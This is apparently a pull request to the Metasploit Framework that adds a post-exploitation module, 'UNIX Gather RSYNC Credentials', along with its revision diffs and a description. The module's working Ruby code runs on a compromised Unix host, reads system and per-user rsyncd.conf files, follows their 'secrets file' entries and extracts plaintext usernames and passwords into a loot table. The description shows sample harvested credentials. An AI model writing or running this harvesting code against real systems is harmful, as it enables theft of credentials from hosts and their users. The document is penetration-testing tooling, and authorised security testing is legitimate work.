### PR TITLE
Post module for gathering RSYNC credentials

### DIFF
--- a/lib/rex/parser/ini.rb
+++ b/lib/rex/parser/ini.rb
@@ -54,7 +54,7 @@ class Ini < Hash
   #
   def each_group(&block)
     self.keys.each { |k|
-      yield k
+      yield
     }
   end
 

--- a/lib/rex/parser/ini.rb
+++ b/lib/rex/parser/ini.rb
@@ -54,7 +54,7 @@ class Ini < Hash
   #
   def each_group(&block)
     self.keys.each { |k|
-      yield
+      yield k
     }
   end
 

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -19,14 +19,13 @@ class Metasploit3 < Msf::Post
         ),
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
-        'Platform'      => %w(bsd linux osx unix),
         'SessionTypes'  => %w(shell)
       )
     )
 
     register_options(
       [
-        OptString.new('USER_CONFIG', [false, 'Attempt to passwords from this RSYNC ' \
+        OptString.new('USER_CONFIG', [false, 'Attempt to get passwords from this RSYNC ' \
           'configuration file relative to each local user\'s home directory.  Leave unset to disable.', 'rsyncd.conf'])
       ]
     )

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Post
 
     register_options(
       [
-        OptBool.new('USER_CONFIGS', [true, 'Get passwords from each local user\'s rsyncd.conf', true])
+        OptString.new('USER_CONFIG', [false, 'Attempt to passwords from this RSYNC ' \
+          'configuration file relative to each local user\'s home directory.  Leave unset to disable.', 'rsyncd.conf'])
       ]
     )
     register_advanced_options(
@@ -34,6 +35,10 @@ class Metasploit3 < Msf::Post
         OptString.new('RSYNCD_CONFIG', [true, 'Path to rsyncd.conf', '/etc/rsyncd.conf'])
       ]
     )
+  end
+
+  def setup
+    @user_config = datastore['USER_CONFIG'].blank? ? nil : datastore['USER_CONFIG']
   end
 
   def dump_rsync_secrets(config_file)
@@ -79,7 +84,7 @@ class Metasploit3 < Msf::Post
     # configuration files that may exist (rare)
     config_path = datastore['RSYNCD_CONFIG']
     config_files = Set.new([ config_path ])
-    config_files |= enum_user_directories.map { |d| ::File.join(d, ::File.basename(config_path)) } if datastore['USER_CONFIGS']
+    config_files |= enum_user_directories.map { |d| ::File.join(d, @user_config) } if @user_config
     config_files.map { |config_file| dump_rsync_secrets(config_file) }
   end
 end

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'UNIX Gather RSYNC Credentials',
+        'Description'   => %q(
+          Post Module to obtain credentials saved for RSYNC in various locations
+        ),
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
+        'Platform'      => %w(bsd linux osx unix),
+        'SessionTypes'  => %w(shell)
+      )
+    )
+
+    register_options(
+      [
+        OptBool.new('USER_CONFIGS', [true, 'Get passwords from per-user rsyncd.conf', true])
+      ]
+    )
+  end
+
+  def dump_rsync_secrets(config_file)
+    creds_table = Rex::Ui::Text::Table.new(
+      'Header' => "RSYNC credentials from #{config_file}",
+      'Indent' => 1,
+      'Columns' => %w(Username Password Module)
+    )
+
+    # read the rsync configuration file, extracting the 'secrets file'
+    # directive for any rsync modules (shares) within
+    rsync_config = Rex::Parser::Ini.new(config_file)
+    # https://github.com/rapid7/metasploit-framework/issues/6265
+    rsync_config.each_key do |rmodule|
+      # XXX: Ini assumes anything on either side of the = is the key and value,
+      # including spaces, so we need to fix this
+      module_config = Hash[rsync_config[rmodule].map { |k, v| [ k.strip, v.strip ] }]
+      next unless (secrets_file = module_config['secrets file'])
+      read_file(secrets_file).split(/\n/).map do |line|
+        next if line =~ /^#/
+        if /^(?<user>[^:]+):(?<password>.*)$/ =~ line
+          creds_table << [ user, password, rmodule ]
+        end
+      end
+    end
+
+    return if creds_table.rows.empty?
+
+    print_line("\n" + creds_table.to_s)
+
+    # store all found credentials
+    path = store_loot(
+      "rsync.creds",
+      "text/csv",
+      session,
+      creds_table.to_csv,
+      "rsync_credentials.txt",
+      "RSYNC credentials")
+
+    vprint_status("RSYNC credentials stored in: #{path}")
+  end
+
+  def run
+    # build up a list of rsync configuration files to read, including the
+    # default location of the daemon config as well as any per-user configuration files
+    # that may exist (rare)
+    config_files = Set.new([ '/etc/rsyncd.conf' ])
+    config_files |= enum_user_directories.map { |d| ::File.join(d, 'rsyncd.conf') } if datastore['USER_CONFIGS']
+
+    config_files.map do |config_file|
+      dump_rsync_secrets(config_file)
+    end
+  end
+end

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -26,12 +26,13 @@ class Metasploit3 < Msf::Post
 
     register_options(
       [
-        OptBool.new('USER_CONFIGS', [true, 'Get passwords from per-user rsyncd.conf', true])
+        OptBool.new('USER_CONFIGS', [true, 'Get passwords from each local user\'s rsyncd.conf', true])
       ]
     )
   end
 
   def dump_rsync_secrets(config_file)
+    vprint_status("Attempting to get RSYNC creds from #{config_file}")
     creds_table = Rex::Ui::Text::Table.new(
       'Header' => "RSYNC credentials from #{config_file}",
       'Columns' => %w(Username Password Module)
@@ -69,11 +70,10 @@ class Metasploit3 < Msf::Post
 
   def run
     # build up a list of rsync configuration files to read, including the
-    # default location of the daemon config as well as any per-user configuration files
-    # that may exist (rare)
+    # default location of the daemon config as well as any per-user
+    # configuration files that may exist (rare)
     config_files = Set.new([ '/etc/rsyncd.conf' ])
     config_files |= enum_user_directories.map { |d| ::File.join(d, 'rsyncd.conf') } if datastore['USER_CONFIGS']
-
     config_files.map { |config_file| dump_rsync_secrets(config_file) }
   end
 end

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -34,7 +34,6 @@ class Metasploit3 < Msf::Post
   def dump_rsync_secrets(config_file)
     creds_table = Rex::Ui::Text::Table.new(
       'Header' => "RSYNC credentials from #{config_file}",
-      'Indent' => 1,
       'Columns' => %w(Username Password Module)
     )
 
@@ -57,18 +56,15 @@ class Metasploit3 < Msf::Post
 
     return if creds_table.rows.empty?
 
-    print_line("\n" + creds_table.to_s)
-
-    # store all found credentials
-    path = store_loot(
+    print_line(creds_table.to_s)
+    store_loot(
       "rsync.creds",
       "text/csv",
       session,
       creds_table.to_csv,
       "rsync_credentials.txt",
-      "RSYNC credentials")
-
-    vprint_status("RSYNC credentials stored in: #{path}")
+      "RSYNC credentials from #{config_file}"
+    )
   end
 
   def run
@@ -78,8 +74,6 @@ class Metasploit3 < Msf::Post
     config_files = Set.new([ '/etc/rsyncd.conf' ])
     config_files |= enum_user_directories.map { |d| ::File.join(d, 'rsyncd.conf') } if datastore['USER_CONFIGS']
 
-    config_files.map do |config_file|
-      dump_rsync_secrets(config_file)
-    end
+    config_files.map { |config_file| dump_rsync_secrets(config_file) }
   end
 end

--- a/modules/post/multi/gather/rsyncd_creds.rb
+++ b/modules/post/multi/gather/rsyncd_creds.rb
@@ -29,6 +29,11 @@ class Metasploit3 < Msf::Post
         OptBool.new('USER_CONFIGS', [true, 'Get passwords from each local user\'s rsyncd.conf', true])
       ]
     )
+    register_advanced_options(
+      [
+        OptString.new('RSYNCD_CONFIG', [true, 'Path to rsyncd.conf', '/etc/rsyncd.conf'])
+      ]
+    )
   end
 
   def dump_rsync_secrets(config_file)
@@ -72,8 +77,9 @@ class Metasploit3 < Msf::Post
     # build up a list of rsync configuration files to read, including the
     # default location of the daemon config as well as any per-user
     # configuration files that may exist (rare)
-    config_files = Set.new([ '/etc/rsyncd.conf' ])
-    config_files |= enum_user_directories.map { |d| ::File.join(d, 'rsyncd.conf') } if datastore['USER_CONFIGS']
+    config_path = datastore['RSYNCD_CONFIG']
+    config_files = Set.new([ config_path ])
+    config_files |= enum_user_directories.map { |d| ::File.join(d, ::File.basename(config_path)) } if datastore['USER_CONFIGS']
     config_files.map { |config_file| dump_rsync_secrets(config_file) }
   end
 end


### PR DESCRIPTION
RSYNC modules (shares) can be protected by a username and password which are configured on a per-module basis and are stored in separate files, one set of credentials per line stored as `user:pass`.  The pointer to these credentials, if configured, is specified by a the `secrets file` directive in an RSYNC configuration file.  The primary RSYNC configuration file is typically `/etc/rsyncd.conf` but it really could be anywhere.  This module assumes the default location.  These configuration files can also exist in user home directories for the situations in which SSH, RSH and other utilities are used to serve as the transport for the RSYNC communication, and the RSYNC "daemon" is spun up locally for the user in question.

This module locates these configuration files, tracks down and loots the secrets, which are conveniently not encrypted or hashed.  

An example running against a host with a running `rsyncd` with the default configuration path as well as my own user with an `rsyncd.conf`: 

```
RSYNC credentials from /etc/rsyncd.conf
=======================================

Username  Password  Module
--------  --------  ------
root      password  share3
root      password  share4

RSYNC credentials from /home/jhart/rsyncd.conf
==============================================

Username  Password  Module
--------  --------  ------
root      password  share1
root      password  share9

[*] Post module execution completed
```
